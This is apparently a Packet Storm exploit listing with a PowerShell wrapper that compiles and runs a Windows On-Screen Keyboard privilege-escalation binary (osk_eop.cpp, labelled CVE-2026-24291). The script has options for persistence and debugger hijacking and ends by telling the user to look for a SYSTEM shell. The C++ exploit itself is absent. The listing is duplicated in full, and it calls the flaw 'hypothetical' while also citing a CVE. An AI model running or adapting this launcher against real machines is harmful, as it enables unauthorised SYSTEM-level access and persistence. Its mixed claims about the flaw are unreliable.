7.8
/ 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
This PowerShell script acts as a wrapper/launcher for a compiled Windows exploit binary targeting the OSK On-Screen Keyboard privilege escalation vulnerability...
Basic Information
ID
PACKETSTORM:220745
Published
May 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : OSK EoP Exploit Wrapper Build and Execution Automation Script |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : This PowerShell script acts as a wrapper/launcher for a compiled Windows exploit binary targeting a hypothetical OSK (On-Screen Keyboard) Elevation of Privilege vulnerability.
[+] POC :
param(
[switch]$Persist,
[switch]$Debugger,
[switch]$Force
)
Write-Host @"
========================================
CVE-2026-24291 - OSK EoP Exploit
SYSTEM Privilege Escalation
by indoushka
========================================
"@ -ForegroundColor Cyan
$msvc = Get-ChildItem "C:\Program Files\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe" -ErrorAction SilentlyContinue | Select-Object -First 1
if (-not $msvc) {
Write-Host "[!] Visual Studio not found. Install Build Tools." -ForegroundColor Red
exit 1
}
$vcVars = "C:\Program Files\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat"
if (Test-Path $vcVars) {
cmd /c "`"$vcVars`" > nul 2>&1 && cl.exe"
}
Write-Host "[*] Compiling exploit..." -ForegroundColor Yellow
$source = "osk_eop.cpp"
$output = "osk_eop.exe"
if (Test-Path $output) { Remove-Item $output }
& cl.exe /EHsc /O2 /MT $source /Fe$output /link advapi32.lib user32.lib
if (-not (Test-Path $output)) {
Write-Host "[!] Compilation failed" -ForegroundColor Red
exit 1
}
Write-Host "[+] Compilation successful" -ForegroundColor Green
Write-Host "[*] Starting OSK for initialization..." -ForegroundColor Yellow
Start-Process "osk.exe" -WindowStyle Hidden
Start-Sleep -Seconds 2
Get-Process "osk" -ErrorAction SilentlyContinue | Stop-Process -Force
$args = @()
if ($Persist) { $args += "--persist" }
if ($Debugger) { $args += "--debugger" }
Write-Host "[*] Running exploit..." -ForegroundColor Green
& .\$output $args
Write-Host "`n[*] Check for SYSTEM shell. UAC prompt may appear - dismiss it." -ForegroundColor Cyan
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : OSK EoP Exploit Wrapper Build and Execution Automation Script |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : This PowerShell script acts as a wrapper/launcher for a compiled Windows exploit binary targeting a hypothetical OSK (On-Screen Keyboard) Elevation of Privilege vulnerability.
[+] POC :
param(
[switch]$Persist,
[switch]$Debugger,
[switch]$Force
)
Write-Host @"
========================================
CVE-2026-24291 - OSK EoP Exploit
SYSTEM Privilege Escalation
by indoushka
========================================
"@ -ForegroundColor Cyan
$msvc = Get-ChildItem "C:\Program Files\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe" -ErrorAction SilentlyContinue | Select-Object -First 1
if (-not $msvc) {
Write-Host "[!] Visual Studio not found. Install Build Tools." -ForegroundColor Red
exit 1
}
$vcVars = "C:\Program Files\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat"
if (Test-Path $vcVars) {
cmd /c "`"$vcVars`" > nul 2>&1 && cl.exe"
}
Write-Host "[*] Compiling exploit..." -ForegroundColor Yellow
$source = "osk_eop.cpp"
$output = "osk_eop.exe"
if (Test-Path $output) { Remove-Item $output }
& cl.exe /EHsc /O2 /MT $source /Fe$output /link advapi32.lib user32.lib
if (-not (Test-Path $output)) {
Write-Host "[!] Compilation failed" -ForegroundColor Red
exit 1
}
Write-Host "[+] Compilation successful" -ForegroundColor Green
Write-Host "[*] Starting OSK for initialization..." -ForegroundColor Yellow
Start-Process "osk.exe" -WindowStyle Hidden
Start-Sleep -Seconds 2
Get-Process "osk" -ErrorAction SilentlyContinue | Stop-Process -Force
$args = @()
if ($Persist) { $args += "--persist" }
if ($Debugger) { $args += "--debugger" }
Write-Host "[*] Running exploit..." -ForegroundColor Green
& .\$output $args
Write-Host "`n[*] Check for SYSTEM shell. UAC prompt may appear - dismiss it." -ForegroundColor Cyan
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================